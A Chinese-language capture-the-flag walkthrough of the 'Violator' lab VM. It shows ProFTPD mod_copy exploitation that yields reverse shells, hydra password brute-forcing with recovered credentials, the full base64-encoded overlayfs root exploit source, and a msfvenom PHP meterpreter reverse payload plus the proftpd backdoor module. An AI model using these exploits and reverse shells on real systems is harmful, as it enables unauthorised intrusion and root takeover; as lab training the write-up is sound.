Write-up-Violator

关于

  • 下载地址:点我
  • Flag:/root/flag.txt
  • 哔哩哔哩:视频

信息收集

  • 网卡:虚拟机vmnet8
➜  ~ ip addr show dev vmnet8 
5: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
    inet 172.16.249.1/24 brd 172.16.249.255 scope global vmnet8
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:8/64 scope link 
       valid_lft forever preferred_lft forever

➜  ~ nmap -T4 -A 172.16.249.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-06 08:09 CST
Nmap scan report for 172.16.249.1
Host is up (0.00013s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE         VERSION
902/tcp open  ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)

Nmap scan report for 172.16.249.129
Host is up (0.00035s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5rc3
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: I Say... I say... I say Boy! You pumpin' for oil or somethin'...?
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (2 hosts up) scanned in 72.25 seconds
  1. IP:172.16.249.129,Ubuntu开放端口21和80。主页里有一张图片和一个wiki的链接,可能是突破口。
➜  ~ curl -L http://172.16.249.129/
<html>
<title>I Say... I say... I say Boy! You pumpin' for oil or somethin'...?</title>
  <body>
    <br>I Say.. I say... I say boy!  You're barkin up the wrong tree!</br>
    <img src="foggie.jpg" alt="foggie.jpg" height=1041" width="731">
   <-- https://en.wikipedia.org/wiki/Violator_(album)  -->
  </body>
</html>

  • 不是WordPress框架,还是用nikto扫一下吧,什么也没发现,看了foggie.jpg的exif信息也没发现。
➜  ~ nikto -h http://172.16.249.129/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.249.129
+ Target Hostname:    172.16.249.129
+ Target Port:        80
+ Start Time:         2018-08-06 08:16:20 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x13e 0x53518115c6709 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2018-08-06 08:16:28 (GMT8) (8 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  1. 所以目标转向了FTP,在nmap的返回结果中可看到ProFTPD 1.3.5rc3,找相关版本是否存在漏洞。
➜  ~ searchsploit ProFTPD 1.3.5
-------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------
 Exploit Title                                                                                                            |  Path
                                                                                                                          | (/home/kali-team/Kali-Team/exploit-database/)
-------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                 | exploits/linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                       | exploits/linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                                                                                 | exploits/linux/remote/36742.txt
-------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------

漏洞利用

  • 三个漏洞都可以利用,这里使用第一个Metasploit框架中的,比较方便。
msf > use exploit/unix/ftp/proftpd_modcopy_exec 
msf exploit(unix/ftp/proftpd_modcopy_exec) > show options 

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www         yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   ProFTPD 1.3.5


msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost 172.16.249.129
rhost => 172.16.249.129
msf exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
sitepath => /var/www/html
msf exploit(unix/ftp/proftpd_modcopy_exec) > run 

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.129:80 - 172.16.249.129:21 - Connected to FTP server
[*] 172.16.249.129:80 - 172.16.249.129:21 - Sending copy commands to FTP server
[*] 172.16.249.129:80 - Executing PHP payload /O8hgrL.php
[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.129:33406) at 2018-08-06 14:10:35 +0800

ls
O8hgrL.php
foggie.jpg
i0KEqK.php
index.html
  • 系统是Ubuntu,所以路径设置为/var/www/html,目录下的两个PHP文件就是Metasploit生成的后门。
whoami
www-data
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
proftpd:x:104:65534::/var/run/proftpd:/bin/false
ftp:x:105:65534::/srv/ftp:/bin/false
mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash
uname -a
Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
  • 发现有几个用户名dg mg af aw,上传到服务器试了,有提权漏洞,但www-data不能用sudo。
www-data@violator:/var/www/html$ cat /etc/group
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,dg
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:dg
floppy:x:25:
tape:x:26:
sudo:x:27:dg
audio:x:29:
dip:x:30:dg
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:dg
staff:x:50:
games:x:60:
users:x:100:mg,af,aw
nogroup:x:65534:
libuuid:x:101:
netdev:x:102:
crontab:x:103:
syslog:x:104:
fuse:x:105:
messagebus:x:106:
mlocate:x:107:
ssh:x:108:
landscape:x:109:
dg:x:1000:
lpadmin:x:110:dg
sambashare:x:111:dg
ssl-cert:x:112:
mg:x:1001:
af:x:1002:
aw:x:1003:
  • 能sudo的只有dg一个用户,去翻一下各个用户的home目录。然后找到下面的信息。
www-data@violator:/home/af$ ls
ls
minarke-1.21  minarke-1.21.tar.bz2
www-data@violator:/home/aw$ file hint
file hint
hint: ASCII text
www-data@violator:/home/aw$ cat hint
cat hint
You are getting close... Can you crack the final enigma..?
www-data@violator:/home/aw$ 
www-data@violator:/home$ ls dg
ls dg
bd
www-data@violator:/home/mg$ file faith_and_devotion
file faith_and_devotion
faith_and_devotion: ASCII text
www-data@violator:/home/mg$ cat faith_and_devotion
cat faith_and_devotion
Lyrics:

* Use Wermacht with 3 rotors
* Reflector to B
Initial: A B C
Alphabet Ring: C B A
Plug Board A-B, C-D

www-data@violator:/home/mg$ 

  • 全部复制到/var/www/html下载会本地。思路断了,外国的东西看不懂。然后看会了前期发现的wiki。想到了用CeWL把wiki的单词爬下来当字典,爆破那四个用户。CeWL的说明介绍。我其实是把专辑和歌名那一部分去掉空格作为密码字典的。

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

➜  CeWL git:(master) ✗ ./cewl.rb -v 'https://en.wikipedia.org/wiki/Violator_(album)' -d 1 -w pass.txt
➜  CeWL git:(master) ✗ cat pass.txt |wc -l
10429
➜  CeWL git:(master) ✗ hydra -L user.txt -P pass.txt -u 172.16.249.129 ftp
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 18:56:59
[DATA] max 16 tasks per 1 server, overall 16 tasks, 92 login tries (l:4/p:23), ~6 tries per task
[DATA] attacking ftp://172.16.249.129:21/
[21][ftp] host: 172.16.249.129   login: aw   password: sweetestperfection
[21][ftp] host: 172.16.249.129   login: af   password: enjoythesilence
[21][ftp] host: 172.16.249.129   login: mg   password: bluedress
[21][ftp] host: 172.16.249.129   login: dg   password: policyoftruth
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
➜  CeWL git:(master) ✗ 

提权

  1. 第一种时直接上exp,因为msf拿到的shell没有上传功能,一句话木马好像也不行。所以先把exp.c转为base64,再写到shell里,到了服务器那边再解码成exp.c,然后编译执行。
➜  ~ searchsploit -p 39166
  Exploit: Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)
      URL: https://www.exploit-db.com/exploits/39166/
     Path: /home/kali-team/Kali-Team/exploit-database/exploits/linux/local/39166.c
File Type: C source, ASCII text, with CRLF line terminators

➜  ~ cp /home/kali-team/Kali-Team/exploit-database/exploits/linux/local/39166.c exp.c 
➜  ~ cat exp.c|base64 
LyoNCmp1c3QgYW5vdGhlciBvdmVybGF5ZnMgZXhwbG9pdCwgd29ya3Mgb24ga2VybmVscyBiZWZv
cmUgMjAxNS0xMi0yNg0KDQojIEV4cGxvaXQgVGl0bGU6IG92ZXJsYXlmcyBsb2NhbCByb290DQoj
IERhdGU6IDIwMTYtMDEtMDUNCiMgRXhwbG9pdCBBdXRob3I6IHJlYmVsDQojIFZlcnNpb246IFVi
dW50dSAxNC4wNCBMVFMsIDE1LjEwIGFuZCBtb3JlDQojIFRlc3RlZCBvbjogVWJ1bnR1IDE0LjA0
IExUUywgMTUuMTANCiMgQ1ZFIDogQ1ZFLTIwMTUtODY2MA0KDQpibGFoQHVidW50dTp+JCBpZA0K
dWlkPTEwMDEoYmxhaCkgZ2lkPTEwMDEoYmxhaCkgZ3JvdXBzPTEwMDEoYmxhaCkNCmJsYWhAdWJ1
bnR1On4kIHVuYW1lIC1hICYmIGNhdCAvZXRjL2lzc3VlDQpMaW51eCB1YnVudHUgMy4xOS4wLTQy
LWdlbmVyaWMgIzQ4fjE0LjA0LjEtVWJ1bnR1IFNNUCBGcmkgRGVjIDE4IDEwOjI0OjQ5IFVUQyAy
MDE1IHg4Nl82NCB4ODZfNjQgeDg2XzY0IEdOVS9MaW51eA0KVWJ1bnR1IDE0LjA0LjMgTFRTIFxu
IFxsDQpibGFoQHVidW50dTp+JCAuL292ZXJsYXlmYWlsDQpyb290QHVidW50dTp+IyBpZA0KdWlk
PTAocm9vdCkgZ2lkPTEwMDEoYmxhaCkgZ3JvdXBzPTAocm9vdCksMTAwMShibGFoKQ0KDQoxMi8y
MDE1DQpieSByZWJlbA0KDQo2MzU0YjRlMjNkYjIyNWI1NjVkNzlmMjI2ZjJlNDllYzBmZTFlMTli
DQoqLw0KDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzY2hlZC5oPg0KI2luY2x1ZGUg
PHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHNjaGVkLmg+DQojaW5j
bHVkZSA8c3lzL3N0YXQuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMv
bW91bnQuaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1
ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHNjaGVkLmg+DQojaW5jbHVkZSA8c3lzL3N0YXQuaD4N
CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMvbW91bnQuaD4NCiNpbmNsdWRl
IDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzaWduYWwuaD4NCiNpbmNsdWRlIDxmY250bC5oPg0K
I2luY2x1ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPGxpbnV4L3NjaGVkLmg+DQojaW5jbHVkZSA8
c3lzL3dhaXQuaD4NCg0Kc3RhdGljIGNoYXIgY2hpbGRfc3RhY2tbMTAyNCoxMDI0XTsNCg0Kc3Rh
dGljIGludA0KY2hpbGRfZXhlYyh2b2lkICpzdHVmZikNCnsNCiAgICBzeXN0ZW0oInJtIC1yZiAv
dG1wL2hheGhheCIpOw0KICAgIG1rZGlyKCIvdG1wL2hheGhheCIsIDA3NzcpOw0KICAgIG1rZGly
KCIvdG1wL2hheGhheC93IiwgMDc3Nyk7DQogICAgbWtkaXIoIi90bXAvaGF4aGF4L3UiLDA3Nzcp
Ow0KICAgIG1rZGlyKCIvdG1wL2hheGhheC9vIiwwNzc3KTsNCg0KICAgIGlmIChtb3VudCgib3Zl
cmxheSIsICIvdG1wL2hheGhheC9vIiwgIm92ZXJsYXkiLCBNU19NR0NfVkFMLCAibG93ZXJkaXI9
L2Jpbix1cHBlcmRpcj0vdG1wL2hheGhheC91LHdvcmtkaXI9L3RtcC9oYXhoYXgvdyIpICE9IDAp
IHsNCglmcHJpbnRmKHN0ZGVyciwibW91bnQgZmFpbGVkLi5cbiIpOw0KICAgIH0NCg0KICAgIGNo
bW9kKCIvdG1wL2hheGhheC93L3dvcmsiLDA3NzcpOw0KICAgIGNoZGlyKCIvdG1wL2hheGhheC9v
Iik7DQogICAgY2htb2QoImJhc2giLDA0NzU1KTsNCiAgICBjaGRpcigiLyIpOw0KICAgIHVtb3Vu
dCgiL3RtcC9oYXhoYXgvbyIpOw0KICAgIHJldHVybiAwOw0KfQ0KDQppbnQNCm1haW4oaW50IGFy
Z2MsIGNoYXIgKiphcmd2KQ0Kew0KICAgIGludCBzdGF0dXM7DQogICAgcGlkX3Qgd3JhcHBlciwg
aW5pdDsNCiAgICBpbnQgY2xvbmVfZmxhZ3MgPSBDTE9ORV9ORVdOUyB8IFNJR0NITEQ7DQogICAg
c3RydWN0IHN0YXQgczsNCg0KICAgIGlmKCh3cmFwcGVyID0gZm9yaygpKSA9PSAwKSB7DQogICAg
ICAgIGlmKHVuc2hhcmUoQ0xPTkVfTkVXVVNFUikgIT0gMCkNCiAgICAgICAgICAgIGZwcmludGYo
c3RkZXJyLCAiZmFpbGVkIHRvIGNyZWF0ZSBuZXcgdXNlciBuYW1lc3BhY2VcbiIpOw0KDQogICAg
ICAgIGlmKChpbml0ID0gZm9yaygpKSA9PSAwKSB7DQogICAgICAgICAgICBwaWRfdCBwaWQgPQ0K
ICAgICAgICAgICAgICAgIGNsb25lKGNoaWxkX2V4ZWMsIGNoaWxkX3N0YWNrICsgKDEwMjQqMTAy
NCksIGNsb25lX2ZsYWdzLCBOVUxMKTsNCiAgICAgICAgICAgIGlmKHBpZCA8IDApIHsNCiAgICAg
ICAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgImZhaWxlZCB0byBjcmVhdGUgbmV3IG1vdW50IG5h
bWVzcGFjZVxuIik7DQogICAgICAgICAgICAgICAgZXhpdCgtMSk7DQogICAgICAgICAgICB9DQoN
CiAgICAgICAgICAgIHdhaXRwaWQocGlkLCAmc3RhdHVzLCAwKTsNCg0KICAgICAgICB9DQoNCiAg
ICAgICAgd2FpdHBpZChpbml0LCAmc3RhdHVzLCAwKTsNCiAgICAgICAgcmV0dXJuIDA7DQogICAg
fQ0KDQogICAgdXNsZWVwKDMwMDAwMCk7DQoNCiAgICB3YWl0KE5VTEwpOw0KDQogICAgc3RhdCgi
L3RtcC9oYXhoYXgvdS9iYXNoIiwmcyk7DQoNCiAgICBpZihzLnN0X21vZGUgPT0gMHg4OWVkKQ0K
ICAgICAgICBleGVjbCgiL3RtcC9oYXhoYXgvdS9iYXNoIiwiYmFzaCIsIi1wIiwiLWMiLCJybSAt
cmYgL3RtcC9oYXhoYXg7cHl0aG9uIC1jIFwiaW1wb3J0IG9zO29zLnNldHJlc3VpZCgwLDAsMCk7
b3MuZXhlY2woJy9iaW4vYmFzaCcsJ2Jhc2gnKTtcIiIsTlVMTCk7DQoNCiAgICBmcHJpbnRmKHN0
ZGVyciwiY291bGRuJ3QgY3JlYXRlIHN1aWQgOihcbiIpOw0KICAgIHJldHVybiAtMTsNCn0=
➜  ~ 

  • 在服务器这边把base64解码
dg@violator:/var/www/html$ cat exp.txt|base64 -d >exp.c
cat exp.txt|base64 -d >exp.c
dg@violator:/var/www/html$ gcc exp.c
gcc exp.c
dg@violator:/var/www/html$ ls
ls
a.out  exp.c  exp.txt  J0dov8.php  jc7gX.php  vMZTOjJ.php
dg@violator:/var/www/html$ ./a.out
./a.out
root@violator:/var/www/html# id
id
uid=0(root) gid=1000(dg) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(dg)
root@violator:/var/www/html# 
  1. 第二种提权的方法,用用户名:dg密码:policyoftruth登上FTP,切换的/var/www/html然后上传Meterpreter-shell。
  • 生成meterpreter-shell,FTP上传直接PUT就可以了
➜  ~ msfvenom -p  php/meterpreter_reverse_tcp LPORT=7788 LHOST=172.16.249.1 -f raw -o msf.php
msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload php/meterpreter_reverse_tcp 
payload => php/meterpreter_reverse_tcp
msf exploit(multi/handler) > set lport 7788
lport => 7788
msf exploit(multi/handler) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf exploit(multi/handler) > run 

[*] Started reverse TCP handler on 172.16.249.1:7788 
[*] Meterpreter session 1 opened (172.16.249.1:7788 -> 172.16.249.129:35623) at 2018-08-07 20:36:38 +0800
  • 这个功能比较多,我平时也是用这个payload的。
www-data@violator:/var/www/html$ su dg
su dg
Password: policyoftruth

dg@violator:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for dg on violator:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dg may run the following commands on violator:
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
dg@violator:/var/www/html$ 
  • 上面可以看到proftpd这个守护进程是以root权限运行的,而这东西又刚刚好有漏洞。而且执行不要root密码。我们切换到/home/dg/bd/sbin/proftpd把proftpd以root权限执行起来。接着就是去利用漏洞了。
dg@violator:/var/www/html$ cd /home/dg/bd/sbin/
cd /home/dg/bd/sbin/
dg@violator:~/bd/sbin$ ls
ls
ftpscrub  ftpshut  in.proftpd  proftpd
dg@violator:~/bd/sbin$ ls -al
ls -al
total 564
drwxr-xr-x  2 root root   4096 Jun  6  2016 .
drwxr-xr-x 10 root root   4096 Jun  6  2016 ..
-rwxr-xr-x  1 root root  15976 Jun  6  2016 ftpscrub
-rwxr-xr-x  1 root root  10456 Jun  6  2016 ftpshut
lrwxrwxrwx  1 root root      7 Jun  6  2016 in.proftpd -> proftpd
-rwxr-xr-x  1 root root 537488 Jun  6  2016 proftpd
dg@violator:~/bd/sbin$ sudo ./proftpd
sudo ./proftpd
 - setting default address to 127.0.0.1
localhost - SocketBindTight in effect, ignoring DefaultServer
dg@violator:~/bd/sbin$ 
dg@violator:~/bd/sbin$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2121          0.0.0.0:*               LISTEN      -               
tcp        0      0 172.16.249.129:60704    172.16.249.1:4444       CLOSE_WAIT  -               
tcp        0      0 172.16.249.129:60705    172.16.249.1:4444       CLOSE_WAIT  -               
tcp        0      0 172.16.249.129:35623    172.16.249.1:7788       ESTABLISHED 2669/bash       
tcp6       0      0 :::21                   :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 172.16.249.129:80       172.16.249.1:51132      ESTABLISHED -               
dg@violator:~/bd/sbin$ 
  • 现在守护进程已经跑起来了,监听的端口是2121,但是只能由127.0.0.1访问,所以要做端口转发。
meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
[*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121

meterpreter > background 
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/
set payload cmd/unix/bind_perl
set payload cmd/unix/bind_perl_ipv6
set payload cmd/unix/generic
set payload cmd/unix/reverse
set payload cmd/unix/reverse_bash_telnet_ssl
set payload cmd/unix/reverse_perl
set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/reverse_ssl_double_telnet
msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf exploit(unix/ftp/proftpd_133c_backdoor) > show options 

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port (TCP)


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.249.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(unix/ftp/proftpd_133c_backdoor) > run 

[-] Exploit failed: The following options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rport 2121
rport => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(unix/ftp/proftpd_133c_backdoor) > run 
[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 127.0.0.1:2121 - Sending Backdoor Command
[*] Command shell session 2 opened (172.16.249.1:4444 -> 172.16.249.129:60709) at 2018-08-07 21:05:32 +0800

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
  • 那到root权限了,接下来去夺旗。
python -c 'import pty;pty.spawn("/bin/bash")'
root@violator:/# ls
ls
bin   dev  home        lib    lost+found  mnt  proc  run   srv  tmp  var
boot  etc  initrd.img  lib64  media       opt  root  sbin  sys  usr  vmlinuz
root@violator:/# cd /root
cd /root
root@violator:/root# ls
ls
flag.txt
root@violator:/root# cat flag.txt
cat flag.txt
I say... I say... I say boy! Pumping for oil or something...?
---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
root@violator:/root# 

彩蛋

  • 在root目录下有一个隐藏文件夹,下载回来看看发现有密码。
root@violator:/root# ll
ll
total 24
drwx------  3 root root 4096 Jun 14  2016 ./
drwxr-xr-x 22 root root 4096 Jun 14  2016 ../
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
d--x------  2 root root 4096 Jun 14  2016 .basildon/
-rw-r--r--  1 root root  114 Jun 12  2016 flag.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
root@violator:/root# cd .basildon/
cd .basildon/
root@violator:/root/.basildon# ls
ls
crocs.rar
root@violator:/root/.basildon# 

➜  DOWNLOAD john hash --wordlist=/home/kali-team/Kali-Team/password-recovery/CeWL/pass
Warning: detected hash type "rar", but the string is also recognized as "rar-opencl"
Use the "--format=rar-opencl" option to force loading these as that type instead
Loaded 1 password hash (rar, RAR3 [SHA1 AES 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
World in My Eyes (crocs.rar)
1g 0:00:00:00 DONE (2018-08-07 21:20) 3.703g/s 88.88p/s 88.88c/s 88.88C/s enjoythesilence..World in My Eyes
Use the "--show" option to display all of the cracked passwords reliably
Session completed

  • 密码破解出来是World in My Eyes,别问我怎么知道的,情节需要。现在到隐写
➜  DOWNLOAD exiftool artwork.jpg
ExifTool Version Number         : 11.01
File Name                       : artwork.jpg
Directory                       : .
File Size                       : 183 kB
File Modification Date/Time     : 2016:06:12 14:38:12+08:00
File Access Date/Time           : 2018:08:07 21:23:12+08:00
File Inode Change Date/Time     : 2018:08:07 21:23:12+08:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : Violator
Software                        : Google
Artist                          : Dave Gaham
Copyright                       : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Exif Version                    : 0220
Date/Time Original              : 1990:03:19 22:13:30
Create Date                     : 1990:03:19 22:13:30
Sub Sec Time Original           : 04
Sub Sec Time Digitized          : 04
Exif Image Width                : 1450
Exif Image Height               : 1450
XP Title                        : Violator
XP Author                       : Dave Gaham
XP Keywords                     : created by user dg
XP Subject                      : policyoftruth
Padding                         : (Binary data 1590 bytes, use -b option to extract)
About                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
Rights                          : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Creator                         : Dave Gaham
Subject                         : created by user dg
Title                           : Violator
Description                     : Violator
Warning                         : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
Date Acquired                   : 1941:05:09 10:30:18.134
Last Keyword XMP                : created by user dg
Image Width                     : 1450
Image Height                    : 1450
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1450x1450
Megapixels                      : 2.1
Create Date                     : 1990:03:19 22:13:30.04
Date/Time Original              : 1990:03:19 22:13:30.04
➜  DOWNLOAD 

  • 版权那两个地方非常突出了,但是又不是base64,然后在mg目录发现的歌词和一个C程序没用上。

Lyrics:

  • Use Wermacht with 3 rotors
  • Reflector to B
    Initial: A B C
    Alphabet Ring: C B A
    Plug Board A-B, C-D
  • 看来那个C程序是解这串字的,但是他卡住了。
➜  minarke-1.21 ./minarke 


Minarke, an Enigma M4 emulator
by John Gilbert

